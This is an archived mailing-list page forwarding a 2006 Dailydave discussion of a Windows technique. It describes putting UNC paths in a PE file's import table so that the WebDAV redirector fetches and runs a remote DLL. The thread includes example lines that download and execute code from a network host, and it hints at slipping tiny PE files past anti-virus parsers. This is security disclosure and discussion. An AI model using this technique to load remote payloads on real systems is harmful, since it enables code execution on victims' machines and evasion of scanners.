ðòïåëôù 


  áòèé÷ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 


  ðåòóïîáìøîïå 


  ðòïçòáííù 



ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FYI: UNC imports in PE files



> 
> ------------------------------
> 
> Message: 2
> Date: Tue, 7 Nov 2006 02:59:10 -0800
> From: Solar Eclipse <solareclipse@xxxxxxxxxxxx>
> Subject: [Dailydave] UNC imports in PE files
> To: dailydave@xxxxxxxxxxxxxxxxxxxxx
> Message-ID:
>       <20061107105910.GA19579@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="us-ascii"
> 
> Hello list,
> 
> Most of you probably know that the WebDAV redirector in 
> Windows XP tries to
> resolve UNC paths from all applications with WebDAV requests 
> on port 80. This
> means that instead of calling 
> URLDownloadToFile("http://192.168.0.1/foo.exe";)
> and then WinExec, you can do just WinExec("\\192.168.0.1\foo.exe")
> 
> What you probably don't know is that you can use a full UNC 
> path instead of a
> DLL name in the import section of a PE file. When the file is 
> executed, the
> loader will try to access the imported DLL using the UNC path 
> and the WebDAV
> redirector will download the DLL from the Internet.
> 
> It is getting increasingly harder to draw (and defend) the 
> boundaries between
> the local machine, the local network and the the Internet.
> 
> Check out http://www.phreedom.org/solar/code/tinype/ for the 
> source code of a
> 137 byte PE file that downloads a DLL over WebDAV and 
> executes the payload in
> its DllMain function. The PE file doesn't even have to 
> contain any code,
> because DllMain is executed before the entry point of the executable.
> 
> The page also has detailed information about hacking the PE 
> header and building
> the smallest possible PE file that can be executed on 
> Windows. Its size is only
> 97 bytes.
> 
> If anybody is really bored, feel free to check how many 
> anti-virus products
> have PE parsers that don't handle the header of the 97 byte 
> PE file properly
> and fail to unpack and scan the code in the file.
> 
> 
> Good night and good luck,
> Solar Eclipse
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: not available
> Type: application/pgp-signature
> Size: 186 bytes
> Desc: not available
> Url : 
> http://lists.immunitysec.com/pipermail/dailydave/attachments/2
> 0061107/f3e7c53e/attachment-0001.pgp 
> 
> ------------------------------
> 
> 
> ------------------------------
> 
> Message: 7
> Date: Wed, 8 Nov 2006 13:57:16 +0000
> From: Barrie Dempster <barrie@xxxxxxxxxxxxxxxx>
> Subject: Re: [Dailydave] UNC imports in PE files
> To: dailydave@xxxxxxxxxxxxxxxxxxxxx
> Message-ID: <200611081357.35854.barrie@xxxxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-15"
> 
> On Tuesday 07 November 2006 10:59, Solar Eclipse wrote:
> <snip>
> > What you probably don't know is that you can use a full UNC 
> path instead of
> > a DLL name in the import section of a PE file. When the 
> file is executed,
> > the loader will try to access the imported DLL using the 
> UNC path and the
> > WebDAV redirector will download the DLL from the Internet.
> 
> 
> Whilst using this technique to decrease PE size is quite 
> interesting, I'd be 
> willing to bet most here would already be aware of the redirector 
> functionality when loading DLLs, as it was pointed out by 
> Dave Litchfield 
> over a year ago.
> 
> www.ngssoftware.com/papers/xpms.pdf
> 
> -- 
> With Regards..
> Barrie Dempster (zeedo) - Fortiter et Strenue
> 
>               - http://reboot-robot.net -
> 
> "He who hingeth aboot, geteth hee-haw" Victor - Still Game



 




Copyright © Lexa Software, 1996-2009.